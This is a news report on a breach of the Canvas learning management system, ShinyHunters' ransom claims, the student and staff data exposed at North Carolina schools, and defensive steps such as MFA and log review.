Canvas LMS Restored After ShinyHunters Ransom Threat Exposes Data of Thousands of Schools

Canvas is a web‑based learning management system used by K‑12 districts and universities across the United States. On April 29, Instructure observed unauthorized activity within Canvas, revoked the intruder’s access, and enlisted forensic experts. The company notified affected schools on May 5.

On May 7, Instructure discovered additional unauthorized activity tied to the April 29 incident, including altered login pages. It shut down Canvas to investigate and contain the threat, later confirming the attacker exploited a vulnerability in Free‑For‑Teacher accounts—the same issue used in a prior week’s intrusion. Law enforcement, including the FBI and CISA, was notified.

ShinyHunters claimed responsibility, stating that Instructure ignored its outreach and merely applied security patches. The group asserted that nearly 9,000 schools worldwide were impacted and that billions of private messages and records were accessed, giving schools until May 12 to negotiate a settlement.

The breach exposed personal data such as names, email addresses, and student ID numbers for staff, students, and parents in multiple North Carolina districts, including UNC‑Chapel Hill, Duke, and Wake County Public Schools. The state’s Department of Public Instruction blocked Canvas access via NCEdCloud pending further review.

What It Means Organizations should review Free‑For‑Teacher account configurations, enforce multi‑factor authentication, and monitor for unauthorized changes to login pages. Detecting credential misuse aligns with MITRE ATT&CK technique T1078 (Valid Accounts). Patching the identified Free‑For‑Teacher vulnerability and reviewing logs for anomalous authentication events are immediate steps. Watch for any updates from Instructure on the full data exposure scope and whether ShinyHunters follows through on its ransom threat.